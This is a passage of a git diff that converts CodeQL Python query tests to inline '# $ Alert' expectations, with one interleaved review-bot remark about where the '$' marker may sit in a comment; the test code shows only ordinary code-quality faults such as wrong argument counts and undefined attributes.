@@ -82,12 +82,12 @@ def __init__(self, x, y, z): f(*t2) #Too many -F6(*(1,2,3)) -F6(*t3) +F6(*(1,2,3)) # $ Alert[py/call/wrong-number-class-arguments] +F6(*t3) # $ Alert[py/call/wrong-number-class-arguments] #Ok F6(**{'x':1, 'y':2}) #Illegal name -F6(**{'x':1, 'y':2, 'z':3}) +F6(**{'x':1, 'y':2, 'z':3}) # $ Alert[py/call/wrong-named-class-argument] diff --git a/python/ql/test/query-tests/Classes/conflicting/ConflictingAttributesInBaseClasses.qlref b/python/ql/test/query-tests/Classes/conflicting/ConflictingAttributesInBaseClasses.qlref index 3d6fa6534c5c..efd0250ca2eb 100644 --- a/python/ql/test/query-tests/Classes/conflicting/ConflictingAttributesInBaseClasses.qlref +++ b/python/ql/test/query-tests/Classes/conflicting/ConflictingAttributesInBaseClasses.qlref @@ -1 +1,2 @@ -Classes/ConflictingAttributesInBaseClasses.ql \ No newline at end of file +query: Classes/ConflictingAttributesInBaseClasses.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Classes/conflicting/test.py b/python/ql/test/query-tests/Classes/conflicting/test.py index 624cea77ce5b..4bb75114034f 100644 --- a/python/ql/test/query-tests/Classes/conflicting/test.py +++ b/python/ql/test/query-tests/Classes/conflicting/test.py @@ -23,7 +23,7 @@ def meth(self): return 0 -class Conflict(CB1, CB2): +class Conflict(CB1, CB2): # $ Alert pass class Override1(Common): diff --git a/python/ql/test/query-tests/Classes/descriptors/MutatingDescriptor.qlref b/python/ql/test/query-tests/Classes/descriptors/MutatingDescriptor.qlref index 08449405ad61..17ec44acc881 100644 --- a/python/ql/test/query-tests/Classes/descriptors/MutatingDescriptor.qlref +++ b/python/ql/test/query-tests/Classes/descriptors/MutatingDescriptor.qlref @@ -1 +1,2 @@ -Classes/MutatingDescriptor.ql +query: Classes/MutatingDescriptor.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/python/ql/test/query-tests/Classes/descriptors/test.py b/python/ql/test/query-tests/Classes/descriptors/test.py index 180ade50e366..b33ae25440f2 100644 --- a/python/ql/test/query-tests/Classes/descriptors/test.py +++ b/python/ql/test/query-tests/Classes/descriptors/test.py @@ -7,7 +7,7 @@ def __init__(self, func): def __get__(self, obj, obj_type): #Modified state is visible to all instances. - self.my_obj = obj + self.my_obj = obj # $ Alert return self def __call__(self, *args): @@ -22,4 +22,4 @@ def __set__(self, obj, value): def not_ok(self, value): #Modified state is visible to all instances. - self.my_obj = value + self.my_obj = value # $ Alert diff --git a/python/ql/test/query-tests/Classes/equals-attr/DefineEqualsWhenAddingAttributes.qlref b/python/ql/test/query-tests/Classes/equals-attr/DefineEqualsWhenAddingAttributes.qlref index e542a6176ad4..f3385f506bf2 100644 --- a/python/ql/test/query-tests/Classes/equals-attr/DefineEqualsWhenAddingAttributes.qlref +++ b/python/ql/test/query-tests/Classes/equals-attr/DefineEqualsWhenAddingAttributes.qlref @@ -1 +1,2 @@ -Classes/DefineEqualsWhenAddingAttributes.ql \ No newline at end of file +query: Classes/DefineEqualsWhenAddingAttributes.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Classes/equals-attr/attr_eq_test.py b/python/ql/test/query-tests/Classes/equals-attr/attr_eq_test.py index e1e545fe9ef5..a5b1857f878f 100644 --- a/python/ql/test/query-tests/Classes/equals-attr/attr_eq_test.py +++ b/python/ql/test/query-tests/Classes/equals-attr/attr_eq_test.py @@ -18,7 +18,7 @@ def __ne__(self, other): def __hash__(self): return hash((self._x, self._y)) -class BadColorPoint(Point): +class BadColorPoint(Point): # $ Alert def __init__(self, x, y, color): Point.__init__(self, x, y) 
diff --git a/python/ql/test/query-tests/Classes/init-calls-subclass-method/InitCallsSubclassMethod.qlref b/python/ql/test/query-tests/Classes/init-calls-subclass-method/InitCallsSubclassMethod.qlref index 6530409f90ac..c396a4dbc3d7 100644 --- a/python/ql/test/query-tests/Classes/init-calls-subclass-method/InitCallsSubclassMethod.qlref +++ b/python/ql/test/query-tests/Classes/init-calls-subclass-method/InitCallsSubclassMethod.qlref @@ -1 +1,2 @@ -Classes/InitCallsSubclass/InitCallsSubclassMethod.ql +query: Classes/InitCallsSubclass/InitCallsSubclassMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Classes/init-calls-subclass-method/init_calls_subclass.py b/python/ql/test/query-tests/Classes/init-calls-subclass-method/init_calls_subclass.py index ef944a9c7ef5..22f6707a4c93 100644 --- a/python/ql/test/query-tests/Classes/init-calls-subclass-method/init_calls_subclass.py +++ b/python/ql/test/query-tests/Classes/init-calls-subclass-method/init_calls_subclass.py @@ -5,7 +5,7 @@ class Super: def __init__(self, arg): self._state = "Not OK" - self.set_up(arg) # BAD: set_up is overriden. + self.set_up(arg) # BAD: set_up is overriden. # $ Alert self._state = "OK" def set_up(self, arg): @@ -29,7 +29,7 @@ def __init__(self, arg): self.a = arg # BAD: postproc is called after initialization. This is still an issue # since it may still occur before all initialization on a subclass is complete. - self.postproc() + self.postproc() # $ Alert def postproc(self): if self.a == 1: diff --git a/python/ql/test/query-tests/Classes/overwriting-attribute/OverwritingAttributeInSuperClass.qlref b/python/ql/test/query-tests/Classes/overwriting-attribute/OverwritingAttributeInSuperClass.qlref index b29c4d250250..dcea036ee608 100644 --- a/python/ql/test/query-tests/Classes/overwriting-attribute/OverwritingAttributeInSuperClass.qlref +++ b/python/ql/test/query-tests/Classes/overwriting-attribute/OverwritingAttributeInSuperClass.qlref 
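Review bot: In `Super.__init__`, the new line `self.set_up(arg) # BAD: set_up is overriden. # $ Alert` puts the expectation marker after free text inside the same comment, whereas the other annotations in the visible hunks open the comment with `$`. I can't tell from the diff whether the expectation parser accepts a `$` that is not the first token of the comment; if it does not, this expectation is not read and the result is reported as unexpected. Moving the explanation to its own line avoids the question: `# BAD: set_up is overridden.` on the line above, then `self.set_up(arg)  # $ Alert`. The second hunk in this file already uses that layout for `self.postproc()`.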
@@ -1 +1,2 @@ -Classes/OverwritingAttributeInSuperClass.ql +query: Classes/OverwritingAttributeInSuperClass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Classes/overwriting-attribute/overwriting_attribute.py b/python/ql/test/query-tests/Classes/overwriting-attribute/overwriting_attribute.py index 0372db0b2159..a17bfd662d8c 100644 --- a/python/ql/test/query-tests/Classes/overwriting-attribute/overwriting_attribute.py +++ b/python/ql/test/query-tests/Classes/overwriting-attribute/overwriting_attribute.py @@ -2,7 +2,7 @@ class C(object): def __init__(self): - self.var = 0 + self.var = 0 # $ Alert class D(C): @@ -20,4 +20,4 @@ class F(E): def __init__(self): E.__init__(self) - self.var = 1 + self.var = 1 # $ Alert diff --git a/python/ql/test/query-tests/Classes/should-be-context-manager/ShouldBeContextManager.qlref b/python/ql/test/query-tests/Classes/should-be-context-manager/ShouldBeContextManager.qlref index f555b0af07a3..b13b7d8b7b9a 100644 --- a/python/ql/test/query-tests/Classes/should-be-context-manager/ShouldBeContextManager.qlref +++ b/python/ql/test/query-tests/Classes/should-be-context-manager/ShouldBeContextManager.qlref @@ -1 +1,2 @@ -Classes/ShouldBeContextManager.ql \ No newline at end of file +query: Classes/ShouldBeContextManager.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Classes/should-be-context-manager/should_be_context_manager.py b/python/ql/test/query-tests/Classes/should-be-context-manager/should_be_context_manager.py index 68fc81206a37..869d19f3d862 100644 --- a/python/ql/test/query-tests/Classes/should-be-context-manager/should_be_context_manager.py +++ b/python/ql/test/query-tests/Classes/should-be-context-manager/should_be_context_manager.py @@ -1,6 +1,6 @@ #Should be context manager -class MegaDel(object): +class MegaDel(object): # $ Alert def __del__(self): a = self.x + self.y 
@@ -13,7 +13,7 @@ def __del__(self): sum += a print(sum) -class MiniDel(object): +class MiniDel(object): # $ Alert def close(self): pass diff --git a/python/ql/test/query-tests/Classes/undefined-attribute/MaybeUndefinedClassAttribute.qlref b/python/ql/test/query-tests/Classes/undefined-attribute/MaybeUndefinedClassAttribute.qlref index d4986ffc84ce..35f6da7add55 100644 --- a/python/ql/test/query-tests/Classes/undefined-attribute/MaybeUndefinedClassAttribute.qlref +++ b/python/ql/test/query-tests/Classes/undefined-attribute/MaybeUndefinedClassAttribute.qlref @@ -1 +1,2 @@ -Classes/MaybeUndefinedClassAttribute.ql +query: Classes/MaybeUndefinedClassAttribute.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Classes/undefined-attribute/UndefinedClassAttribute.qlref b/python/ql/test/query-tests/Classes/undefined-attribute/UndefinedClassAttribute.qlref index 7ac0a3b18b77..f0e8fb722784 100644 --- a/python/ql/test/query-tests/Classes/undefined-attribute/UndefinedClassAttribute.qlref +++ b/python/ql/test/query-tests/Classes/undefined-attribute/UndefinedClassAttribute.qlref @@ -1 +1,2 @@ -Classes/UndefinedClassAttribute.ql +query: Classes/UndefinedClassAttribute.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Classes/undefined-attribute/undefined_attribute.py b/python/ql/test/query-tests/Classes/undefined-attribute/undefined_attribute.py index 0eec9974ef15..207e8f837d65 100644 --- a/python/ql/test/query-tests/Classes/undefined-attribute/undefined_attribute.py +++ b/python/ql/test/query-tests/Classes/undefined-attribute/undefined_attribute.py @@ -21,10 +21,10 @@ def ok3(self): print (self.local_exists) def neca1(self): - print (self.not_exists) + print (self.not_exists) # $ Alert[py/undefined-attribute] def neca2(self): - print (self.may_exist) + print (self.may_exist) # $ Alert[py/maybe-undefined-attribute] #This is OK class SetViaDict(object): 
@@ -106,7 +106,7 @@ def use(self): class NoInit(object): def use_y(self): - return self.y + return self.y # $ Alert[py/undefined-attribute] #This is also OK class SetLocally2(object): @@ -181,7 +181,7 @@ def queue_declared(frame): # called in callback self.return_queue = frame.method.queue def use_it(self): - return self.return_queue + return self.return_queue # $ Alert[py/maybe-undefined-attribute] #Check for FPs when overriding builtin methods @@ -247,15 +247,15 @@ def x(self): class Odasa4619a(object): def call(self): - host = self.glance_host - port = self.glance_port + host = self.glance_host # $ Alert[py/undefined-attribute] + port = self.glance_port # $ Alert[py/undefined-attribute] class Odasa4619b(object): def call(self): - host = self.glance_host - port = self.glance_port + host = self.glance_host # $ Alert[py/maybe-undefined-attribute] + port = self.glance_port # $ Alert[py/maybe-undefined-attribute] @decorator def foo(self): diff --git a/python/ql/test/query-tests/Classes/useless/UselessClass.qlref b/python/ql/test/query-tests/Classes/useless/UselessClass.qlref index 9c8e87e962cd..6dac346e62bb 100644 --- a/python/ql/test/query-tests/Classes/useless/UselessClass.qlref +++ b/python/ql/test/query-tests/Classes/useless/UselessClass.qlref @@ -1 +1,2 @@ -Classes/UselessClass.ql +query: Classes/UselessClass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Classes/useless/test.py b/python/ql/test/query-tests/Classes/useless/test.py index 40c9e56e117e..063da81c1727 100644 --- a/python/ql/test/query-tests/Classes/useless/test.py +++ b/python/ql/test/query-tests/Classes/useless/test.py @@ -25,7 +25,7 @@ def do_something_else(self): pass -class Useless1(object): +class Useless1(object): # $ Alert def __init__(self): pass @@ -34,7 +34,7 @@ def do_something(self): pass -class Useless2(object): +class Useless2(object): # $ Alert def do_something(self): pass 
diff --git a/python/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref b/python/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref
index e900e9c5314b..58bc903a431d 100644
--- a/python/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref
+++ b/python/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref
@@ -1 +1 @@
-Diagnostics/ExtractedFiles.ql
+query: Diagnostics/ExtractedFiles.ql
diff --git a/python/ql/test/query-tests/Diagnostics/ExtractionWarnings.qlref b/python/ql/test/query-tests/Diagnostics/ExtractionWarnings.qlref
index 2df3d933e8ae..68969e9bbf1c 100644
--- a/python/ql/test/query-tests/Diagnostics/ExtractionWarnings.qlref
+++ b/python/ql/test/query-tests/Diagnostics/ExtractionWarnings.qlref
@@ -1 +1 @@
-Diagnostics/ExtractionWarnings.ql
+query: Diagnostics/ExtractionWarnings.ql
diff --git a/python/ql/test/query-tests/Exceptions/general/CatchingBaseException.qlref b/python/ql/test/query-tests/Exceptions/general/CatchingBaseException.qlref
index 5588dbf2c7b4..bd98ca75af11 100644
--- a/python/ql/test/query-tests/Exceptions/general/CatchingBaseException.qlref
+++ b/python/ql/test/query-tests/Exceptions/general/CatchingBaseException.qlref
@@ -1 +1 @@
-Exceptions/CatchingBaseException.ql
\ No newline at end of file
+query: Exceptions/CatchingBaseException.ql
diff --git a/python/ql/test/query-tests/Exceptions/general/EmptyExcept.qlref b/python/ql/test/query-tests/Exceptions/general/EmptyExcept.qlref
index 3f4987046b12..16e16f16ba5a 100644
--- a/python/ql/test/query-tests/Exceptions/general/EmptyExcept.qlref
+++ b/python/ql/test/query-tests/Exceptions/general/EmptyExcept.qlref
@@ -1 +1 @@
-Exceptions/EmptyExcept.ql
\ No newline at end of file
+query: Exceptions/EmptyExcept.ql
diff --git a/python/ql/test/query-tests/Exceptions/general/IllegalExceptionHandlerType.qlref b/python/ql/test/query-tests/Exceptions/general/IllegalExceptionHandlerType.qlref
index 6d49710a7599..4e3f71fe812a 100644
--- a/python/ql/test/query-tests/Exceptions/general/IllegalExceptionHandlerType.qlref
+++ b/python/ql/test/query-tests/Exceptions/general/IllegalExceptionHandlerType.qlref
@@ -1 +1 @@
-Exceptions/IllegalExceptionHandlerType.ql
\ No newline at end of file
+query: Exceptions/IllegalExceptionHandlerType.ql
diff --git a/python/ql/test/query-tests/Exceptions/general/IllegalRaise.qlref b/python/ql/test/query-tests/Exceptions/general/IllegalRaise.qlref
index 5a515d5656d3..95e65710025b 100644
--- a/python/ql/test/query-tests/Exceptions/general/IllegalRaise.qlref
+++ b/python/ql/test/query-tests/Exceptions/general/IllegalRaise.qlref
@@ -1 +1 @@
-Exceptions/IllegalRaise.ql
\ No newline at end of file
+query: Exceptions/IllegalRaise.ql
diff --git a/python/ql/test/query-tests/Exceptions/general/NotImplementedIsNotAnException.qlref b/python/ql/test/query-tests/Exceptions/general/NotImplementedIsNotAnException.qlref
index 61ac527ffb99..5b199983f759 100644
--- a/python/ql/test/query-tests/Exceptions/general/NotImplementedIsNotAnException.qlref
+++ b/python/ql/test/query-tests/Exceptions/general/NotImplementedIsNotAnException.qlref
@@ -1 +1 @@
-Exceptions/NotImplementedIsNotAnException.ql
\ No newline at end of file
+query: Exceptions/NotImplementedIsNotAnException.ql
diff --git a/python/ql/test/query-tests/Expressions/Arguments/WrongNameForArgumentInCall.qlref b/python/ql/test/query-tests/Expressions/Arguments/WrongNameForArgumentInCall.qlref
index 3599f204f55e..c6b6ca3d30fa 100644
--- a/python/ql/test/query-tests/Expressions/Arguments/WrongNameForArgumentInCall.qlref
+++ b/python/ql/test/query-tests/Expressions/Arguments/WrongNameForArgumentInCall.qlref
@@ -1 +1,2 @@
-Expressions/WrongNameForArgumentInCall.ql
\ No newline at end of file
+query: Expressions/WrongNameForArgumentInCall.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Expressions/Arguments/WrongNumberArgumentsInCall.qlref b/python/ql/test/query-tests/Expressions/Arguments/WrongNumberArgumentsInCall.qlref index 1bffe8f1cad4..68dc510d5c6e 100644 --- a/python/ql/test/query-tests/Expressions/Arguments/WrongNumberArgumentsInCall.qlref +++ b/python/ql/test/query-tests/Expressions/Arguments/WrongNumberArgumentsInCall.qlref @@ -1 +1,2 @@ -Expressions/WrongNumberArgumentsInCall.ql \ No newline at end of file +query: Expressions/WrongNumberArgumentsInCall.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/Arguments/use_mox.py b/python/ql/test/query-tests/Expressions/Arguments/use_mox.py index 35d35574895a..0af38ad3798c 100644 --- a/python/ql/test/query-tests/Expressions/Arguments/use_mox.py +++ b/python/ql/test/query-tests/Expressions/Arguments/use_mox.py @@ -25,9 +25,9 @@ def m1(self, x, y): #But normal functions are treated normally -f0() -f1(1) +f0() # $ Alert[py/call/wrong-arguments] +f1(1) # $ Alert[py/call/wrong-arguments] #As are normal methods -C().m0() -C().m1(1) +C().m0() # $ Alert[py/call/wrong-arguments] +C().m1(1) # $ Alert[py/call/wrong-arguments] diff --git a/python/ql/test/query-tests/Expressions/Arguments/wrong_arguments.py b/python/ql/test/query-tests/Expressions/Arguments/wrong_arguments.py index 284d1d19bc36..dffafbeee764 100644 --- a/python/ql/test/query-tests/Expressions/Arguments/wrong_arguments.py +++ b/python/ql/test/query-tests/Expressions/Arguments/wrong_arguments.py 
@@ -26,22 +26,22 @@ def f7(x, y, z): # Too few arguments -f0() -f1() -f2() -f3() -f4() -f5() -f6(1) -f7(1,2) +f0() # $ Alert[py/call/wrong-arguments] +f1() # $ Alert[py/call/wrong-arguments] +f2() # $ Alert[py/call/wrong-arguments] +f3() # $ Alert[py/call/wrong-arguments] +f4() # $ Alert[py/call/wrong-arguments] +f5() # $ Alert[py/call/wrong-arguments] +f6(1) # $ Alert[py/call/wrong-arguments] +f7(1,2) # $ Alert[py/call/wrong-arguments] #Too many arguments -f0(1,2) -f1(1,2,3) -f5(1,2,3) -f6(1,2,3) -f6(1,2,3,4) +f0(1,2) # $ Alert[py/call/wrong-arguments] +f1(1,2,3) # $ Alert[py/call/wrong-arguments] +f5(1,2,3) # $ Alert[py/call/wrong-arguments] +f6(1,2,3) # $ Alert[py/call/wrong-arguments] +f6(1,2,3,4) # $ Alert[py/call/wrong-arguments] #OK @@ -54,9 +54,9 @@ def f7(x, y, z): #Illegal name -f0(y=1) -f1(z=1) -f2(x=0, y=1) +f0(y=1) # $ Alert[py/call/wrong-named-argument] +f1(z=1) # $ Alert[py/call/wrong-named-argument] +f2(x=0, y=1) # $ Alert[py/call/wrong-named-argument] #Ok name @@ -78,12 +78,12 @@ def f7(x, y, z): l1d(1) #Too many -l0(1) -l1(1,2) -l1d(1,2) +l0(1) # $ Alert[py/call/wrong-arguments] +l1(1,2) # $ Alert[py/call/wrong-arguments] +l1d(1,2) # $ Alert[py/call/wrong-arguments] #Too few -l1() +l1() # $ Alert[py/call/wrong-arguments] t2 = (1,2) @@ -93,14 +93,14 @@ def f7(x, y, z): f(*t2) #Too many -f6(*(1,2,3)) -f6(*t3) +f6(*(1,2,3)) # $ Alert[py/call/wrong-arguments] +f6(*t3) # $ Alert[py/call/wrong-arguments] #Ok f6(**{'x':1, 'y':2}) #Illegal name -f6(**{'x':1, 'y':2, 'z':3}) +f6(**{'x':1, 'y':2, 'z':3}) # $ Alert[py/call/wrong-named-argument] #Theoretically -1 arguments required. Don't report class C(object): @@ -112,7 +112,7 @@ def f(): #Too many and wrong name -- check only wrong name is flagged. -f1(x, y, z=1) +f1(x, y, z=1) # $ Alert[py/call/wrong-named-argument] #Overriding and call is wrong. @@ -127,5 +127,5 @@ def spam(self, arg0, arg1): pass e = Eggs1() if cond else Eggs2() -e.spam(0) +e.spam(0) # $ Alert[py/call/wrong-arguments] 
diff --git a/python/ql/test/query-tests/Expressions/Formatting/MixedExplicitImplicitIn3101Format.qlref b/python/ql/test/query-tests/Expressions/Formatting/MixedExplicitImplicitIn3101Format.qlref
index 3b9a8dc0ccf9..044e500615f5 100644
--- a/python/ql/test/query-tests/Expressions/Formatting/MixedExplicitImplicitIn3101Format.qlref
+++ b/python/ql/test/query-tests/Expressions/Formatting/MixedExplicitImplicitIn3101Format.qlref
@@ -1 +1,2 @@
-Expressions/Formatting/MixedExplicitImplicitIn3101Format.ql
\ No newline at end of file
+query: Expressions/Formatting/MixedExplicitImplicitIn3101Format.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Expressions/Formatting/UnusedArgumentIn3101Format.qlref b/python/ql/test/query-tests/Expressions/Formatting/UnusedArgumentIn3101Format.qlref
index b3e654ad0526..8de137448b61 100644
--- a/python/ql/test/query-tests/Expressions/Formatting/UnusedArgumentIn3101Format.qlref
+++ b/python/ql/test/query-tests/Expressions/Formatting/UnusedArgumentIn3101Format.qlref
@@ -1 +1,2 @@
-Expressions/Formatting/UnusedArgumentIn3101Format.ql
\ No newline at end of file
+query: Expressions/Formatting/UnusedArgumentIn3101Format.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Expressions/Formatting/UnusedNamedArgumentIn3101Format.qlref b/python/ql/test/query-tests/Expressions/Formatting/UnusedNamedArgumentIn3101Format.qlref
index 6a77d8910797..a1e71b6cd8b9 100644
--- a/python/ql/test/query-tests/Expressions/Formatting/UnusedNamedArgumentIn3101Format.qlref
+++ b/python/ql/test/query-tests/Expressions/Formatting/UnusedNamedArgumentIn3101Format.qlref
@@ -1 +1,2 @@
-Expressions/Formatting/UnusedNamedArgumentIn3101Format.ql
\ No newline at end of file
+query: Expressions/Formatting/UnusedNamedArgumentIn3101Format.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Expressions/Formatting/WrongNameInArgumentsFor3101Format.qlref b/python/ql/test/query-tests/Expressions/Formatting/WrongNameInArgumentsFor3101Format.qlref
index e0b308870342..6bd5b9c75dad 100644
--- a/python/ql/test/query-tests/Expressions/Formatting/WrongNameInArgumentsFor3101Format.qlref
+++ b/python/ql/test/query-tests/Expressions/Formatting/WrongNameInArgumentsFor3101Format.qlref
@@ -1 +1,2 @@
-Expressions/Formatting/WrongNameInArgumentsFor3101Format.ql
\ No newline at end of file
+query: Expressions/Formatting/WrongNameInArgumentsFor3101Format.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Expressions/Formatting/WrongNumberArgumentsFor3101Format.qlref b/python/ql/test/query-tests/Expressions/Formatting/WrongNumberArgumentsFor3101Format.qlref
index 130a6525a901..02168e01c644 100644
--- a/python/ql/test/query-tests/Expressions/Formatting/WrongNumberArgumentsFor3101Format.qlref
+++ b/python/ql/test/query-tests/Expressions/Formatting/WrongNumberArgumentsFor3101Format.qlref
@@ -1 +1,2 @@
-Expressions/Formatting/WrongNumberArgumentsFor3101Format.ql
\ No newline at end of file
+query: Expressions/Formatting/WrongNumberArgumentsFor3101Format.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Expressions/Formatting/test.py b/python/ql/test/query-tests/Expressions/Formatting/test.py
index e9fd23c8aad6..3117a9de2a48 100755
--- a/python/ql/test/query-tests/Expressions/Formatting/test.py
+++ b/python/ql/test/query-tests/Expressions/Formatting/test.py
@@ -1,11 +1,11 @@ from __future__ import unicode_literals -mixed_format1 = "{}{1}" +mixed_format1 = "{}{1}" # $ Alert[py/str-format/mixed-fields] named_format1 = "{name!r}, {0}" explicit_format1 = "{0}, {1}" implicit_format1 = "{}, {}" -mixed_format2 = "{}{1}" +mixed_format2 = "{}{1}" # $ Alert[py/str-format/mixed-fields] named_format2 = "{name!r}, {0}" explicit_format2 = "{0}, {1}" implicit_format2 = "{}, {}" 
@@ -14,23 +14,23 @@ mixed_format1.format("Hello", "World") format(mixed_format2, "Hello", "World") -named_format1.format("Hello", world="World") -format(named_format2, "Hello", world="World") +named_format1.format("Hello", world="World") # $ Alert[py/str-format/missing-named-argument] Alert[py/str-format/surplus-named-argument] +format(named_format2, "Hello", world="World") # $ Alert[py/str-format/missing-named-argument] Alert[py/str-format/surplus-named-argument] -named_format1.format(name="Hello", world="World") -format(named_format2, name="Hello", world="World") +named_format1.format(name="Hello", world="World") # $ Alert[py/str-format/missing-argument] Alert[py/str-format/surplus-named-argument] +format(named_format2, name="Hello", world="World") # $ Alert[py/str-format/missing-argument] Alert[py/str-format/surplus-named-argument] -explicit_format1.format("Hello") -format(explicit_format2, "Hello") +explicit_format1.format("Hello") # $ Alert[py/str-format/missing-argument] +format(explicit_format2, "Hello") # $ Alert[py/str-format/missing-argument] -implicit_format1.format("Hello") -format(implicit_format2, "Hello") +implicit_format1.format("Hello") # $ Alert[py/str-format/missing-argument] +format(implicit_format2, "Hello") # $ Alert[py/str-format/missing-argument] -explicit_format1.format("Hello", "World", "Extra") -format(explicit_format2, "Hello", "World", "Extra") +explicit_format1.format("Hello", "World", "Extra") # $ Alert[py/str-format/surplus-argument] +format(explicit_format2, "Hello", "World", "Extra") # $ Alert[py/str-format/surplus-argument] -implicit_format1.format("Hello", "World", "Extra") -format(implicit_format2, "Hello", "World", "Extra") +implicit_format1.format("Hello", "World", "Extra") # $ Alert[py/str-format/surplus-argument] +format(implicit_format2, "Hello", "World", "Extra") # $ Alert[py/str-format/surplus-argument] #OK ODASA-3197 if cond: 
@@ -42,8 +42,8 @@ x_or_y.format(x="x", y="y") #Still fail for multiple formats -format(x_or_y, x="x", y="y", z="z") -x_or_y.format(x="x", y="y", z="z") +format(x_or_y, x="x", y="y", z="z") # $ Alert[py/str-format/surplus-named-argument] +x_or_y.format(x="x", y="y", z="z") # $ Alert[py/str-format/surplus-named-argument] #False positive reported by customer. -- Verify fix. "{{}}>".format(html_class) diff --git a/python/ql/test/query-tests/Expressions/Formatting/unknown_format_string.py b/python/ql/test/query-tests/Expressions/Formatting/unknown_format_string.py index a3b32a504db3..690716e20b2d 100644 --- a/python/ql/test/query-tests/Expressions/Formatting/unknown_format_string.py +++ b/python/ql/test/query-tests/Expressions/Formatting/unknown_format_string.py @@ -6,7 +6,7 @@ def possibly_unknown_format_string1(x): fmt = user_specified else: fmt = "{a}" - return fmt.format(a=1,b=2) + return fmt.format(a=1,b=2) # $ Alert[py/str-format/surplus-named-argument] def possibly_unknown_format_string2(x): user_specified = input() @@ -14,7 +14,7 @@ def possibly_unknown_format_string2(x): fmt = user_specified else: fmt = "{a}" - return fmt.format(a=1,b=2) + return fmt.format(a=1,b=2) # $ Alert[py/str-format/surplus-named-argument] def possibly_unknown_format_string3(x): @@ -22,4 +22,4 @@ def possibly_unknown_format_string3(x): fmt = input() else: fmt = "{a}" - return fmt.format(a=1,b=2) + return fmt.format(a=1,b=2) # $ Alert[py/str-format/surplus-named-argument] diff --git a/python/ql/test/query-tests/Expressions/Regex/BackspaceEscape.qlref b/python/ql/test/query-tests/Expressions/Regex/BackspaceEscape.qlref index 2bf85f8a45aa..25a46ec7b29b 100644 --- a/python/ql/test/query-tests/Expressions/Regex/BackspaceEscape.qlref +++ b/python/ql/test/query-tests/Expressions/Regex/BackspaceEscape.qlref @@ -1 +1,2 @@ -Expressions/Regex/BackspaceEscape.ql +query: Expressions/Regex/BackspaceEscape.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/python/ql/test/query-tests/Expressions/Regex/DuplicateCharacterInSet.qlref b/python/ql/test/query-tests/Expressions/Regex/DuplicateCharacterInSet.qlref
index f0fc83c214eb..358d546ce8ad 100644
--- a/python/ql/test/query-tests/Expressions/Regex/DuplicateCharacterInSet.qlref
+++ b/python/ql/test/query-tests/Expressions/Regex/DuplicateCharacterInSet.qlref
@@ -1 +1,2 @@
-Expressions/Regex/DuplicateCharacterInSet.ql
+query: Expressions/Regex/DuplicateCharacterInSet.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Expressions/Regex/MissingPartSpecialGroup.qlref b/python/ql/test/query-tests/Expressions/Regex/MissingPartSpecialGroup.qlref
index faf8f31ad4d6..215e7874972d 100644
--- a/python/ql/test/query-tests/Expressions/Regex/MissingPartSpecialGroup.qlref
+++ b/python/ql/test/query-tests/Expressions/Regex/MissingPartSpecialGroup.qlref
@@ -1 +1,2 @@
-Expressions/Regex/MissingPartSpecialGroup.ql
+query: Expressions/Regex/MissingPartSpecialGroup.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Expressions/Regex/UnmatchableCaret.qlref b/python/ql/test/query-tests/Expressions/Regex/UnmatchableCaret.qlref
index 161fd59f7f28..218dcb021982 100644
--- a/python/ql/test/query-tests/Expressions/Regex/UnmatchableCaret.qlref
+++ b/python/ql/test/query-tests/Expressions/Regex/UnmatchableCaret.qlref
@@ -1 +1,2 @@
-Expressions/Regex/UnmatchableCaret.ql
+query: Expressions/Regex/UnmatchableCaret.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Expressions/Regex/UnmatchableDollar.qlref b/python/ql/test/query-tests/Expressions/Regex/UnmatchableDollar.qlref
index b162342922c5..cabb436241ce 100644
--- a/python/ql/test/query-tests/Expressions/Regex/UnmatchableDollar.qlref
+++ b/python/ql/test/query-tests/Expressions/Regex/UnmatchableDollar.qlref
